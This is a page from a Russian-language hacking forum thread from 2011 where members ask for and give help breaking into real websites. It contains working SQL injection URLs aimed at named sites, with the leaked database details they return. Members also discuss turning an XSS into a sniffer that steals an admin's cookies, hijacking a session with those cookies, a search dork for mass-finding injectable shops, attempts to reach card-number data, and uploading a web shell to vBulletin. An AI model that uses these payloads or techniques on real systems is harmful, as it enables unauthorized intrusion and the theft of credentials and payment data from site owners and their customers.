Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Смотря, какой сервер стоит :)
     
  2. Kudos

    Kudos New Member

    Joined:
    22 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о
    Внимание вопрос:
    Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/thread229555.html
     
    _________________________
  4. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Таблица:
    wp_options
    в ней данные о урл блога
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    Code:
    http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x
    не пойму как дальше таблицы и колонки вывести
     
  6. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Code:
    http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+
    Прошу помощи в раскрутке.
     
    _________________________
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    MySQL Error: Duplicate entry '5.0.92-community:linley5_tlgcms:linley5_linley5@localhost:unknow' for key 1

    MySQL Error: Duplicate entry 'linley5_tlgcms:cms_accounts: password1' for key 1
     
    #17927 er9j6@, 24 Sep 2011
    Last edited: 24 Sep 2011
    2 people like this.
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.euromet.ru/search/?search=ololo'%20and%20updatexml(0x03b,concat(0x3b,(select%20table_name%20FROM%20information_schema.tables%20limit%200,1)),0x03b)--%20x

    Error Number: 1105 XPATH syntax error: ';CHARACTER_SETS'

    =\\
     
    #17928 Tigger, 24 Sep 2011
    Last edited: 24 Sep 2011
    2 people like this.
  9. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Что можно с этим сделать?
    [​IMG]
    Полный размер
    И что это за хеши внизу, точнее от чего они?
     
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Похекать шоп не получится, так как стоит 4 ветка MySQL.

    4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
     
    #17930 er9j6@, 24 Sep 2011
    Last edited: 24 Sep 2011
  11. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    При регистрации в поле вопрос я ввел "><script>alert(/XSS/)</script> потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/
    Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)
     
  12. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл.

    может быть привязка к ip? есть еще варианты?
     
    #17932 justonline, 25 Sep 2011
    Last edited: 25 Sep 2011
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    нет доступа к inf. schema - не значит, что похекать не получится.
     
    1 person likes this.
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Всё получиться :)
    То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц.


    Префикс таблиц: 'theqice_'

    Дорк:
    Code:
    inurl:"prodisp.php?prodcatind"
    Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.
     
    #17934 randman, 25 Sep 2011
    Last edited: 25 Sep 2011
    1 person likes this.
  15. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    а не проще поставить такой двиг себе на машину?)
     
  16. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится
     
  17. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    скинул названия таблиц + колонок в ПМ
     
  18. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Как залить шел в vBulletin 4.0.3 если есть доступ к админке?
    Вот таблицы в admincp
    [​IMG]
    [​IMG]

    Что нажимать? просто я нап первый раз заливаю шел :(
     
  19. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37

    http://forum.antichat.ru/thread22852.html
     
  20. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Те что пишут:
    Способ заливки шелла в vBulletin 3.5.*.
    Способ заливки шелла в vBulletin 2.*.* и 3.0.*
    Я пробивал и нечего не получилось... Писало Error на линии 1010
     
Thread Status:
Not open for further replies.